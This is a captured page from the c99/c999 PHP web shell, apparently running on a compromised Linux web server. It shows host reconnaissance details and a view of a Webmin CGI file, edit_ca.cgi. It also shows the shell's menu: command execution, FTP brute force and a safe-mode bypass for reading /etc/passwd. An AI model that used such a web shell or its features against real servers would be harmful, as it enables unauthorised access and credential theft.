!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/webmin/   drwxr-xr-x
Free 53.79 GB of 127.8 GB (42.09%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_ca.cgi (2.52 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# edit_ca.cgi
# Display the current CA or a form for creating one

require './webmin-lib.pl';
ui_print_header(undef, $text{'ca_title'}, "");
get_miniserv_config(\%miniserv);

%aclconfig = foreign_config("acl");
foreign_require("acl", "acl-lib.pl");
if (!$ENV{"MINISERV_CONFIG"}) {
    print "<p>$text{'ca_eminiserv'}<p>\n";
    ui_print_footer("", $text{'index_return'});
    exit;
    }
elsif (uc($ENV{'HTTPS'}) ne 'ON') {
    print "<p>$text{'ca_essl'}<p>\n";
    ui_print_footer("", $text{'index_return'});
    exit;
    }
elsif (!defined(&Net::SSLeay::X509_STORE_CTX_get_current_cert) ||
       !defined(&Net::SSLeay::CTX_load_verify_locations) ||
       !defined(&Net::SSLeay::CTX_set_verify)) {
    print "<p>$text{'ca_eversion'}<p>\n";
    ui_print_footer("", $text{'index_return'});
    exit;
    }
elsif (!acl::get_ssleay()) {
    print "<p>",text('ca_essleay',
              "<tt>$aclconfig{'ssleay'}</tt>"),"<p>\n";
    ui_print_footer("", $text{'index_return'});
    exit;
    }

print -r $miniserv{'ca'} ? $text{'ca_newmsg1'} : $text{'ca_newmsg1'},"<p>\n";

print ui_form_start("setup_ca.cgi", "post");
print ui_table_start($text{'ca_header1'}, undef, 2);

print &ui_table_row($text{'ca_cn'},
            &ui_textbox("commonName", undef, 30));

print &ui_table_row($text{'ca_email'},
            &ui_textbox("emailAddress", undef, 30));

print &ui_table_row($text{'ca_ou'},
            &ui_textbox("organizationalUnitName", undef, 30));

print &ui_table_row($text{'ca_o'},
            &ui_textbox("organizationName", undef, 30));

print &ui_table_row($text{'ca_sp'},
            &ui_textbox("stateOrProvinceName", undef, 15));

print &ui_table_row($text{'ca_c'},
            &ui_textbox("countryName", undef, 2));

print &ui_table_row($text{'ssl_size'},
                    &ui_opt_textbox("size", undef, 6,
                                    "$text{'default'} ($default_key_size)").
                    " ".$text{'ssl_bits'});

print ui_table_end();
print ui_form_end([ [ "create", $text{'ca_create'} ] ]);

print ui_hr();

print -r $miniserv{'ca'} ? $text{'ca_oldmsg1'} : $text{'ca_oldmsg2'},"<p>\n";

print ui_form_start("change_ca.cgi", "form-data");
print ui_table_start($text{'ca_header2'}, undef, 2);
print ui_table_row(undef,
    &ui_textarea("rows",
        $miniserv{'ca'} ? &read_file_contents($miniserv{'ca'}) : undef,
        20, 70));
print ui_table_end();
print ui_form_end([ [ "save", $text{'save'} ] ]);

if (-r $miniserv{'ca'}) {
    print ui_hr();
    print &ui_buttons_start();
    print &ui_buttons_row("stop_ca.cgi", $text{'ca_stop'},
                  $text{'ca_stopmsg'});
    print &ui_buttons_end();
    }

ui_print_footer("", $text{'index_return'});

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd
Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 
:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0106 ]--